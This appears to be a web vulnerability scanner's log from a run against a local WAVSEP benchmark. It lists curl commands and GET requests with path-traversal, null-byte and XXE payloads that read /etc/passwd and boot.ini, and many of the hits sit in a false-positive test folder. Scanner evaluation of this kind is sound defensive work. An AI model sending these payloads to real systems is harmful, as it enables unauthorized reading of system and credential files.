curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
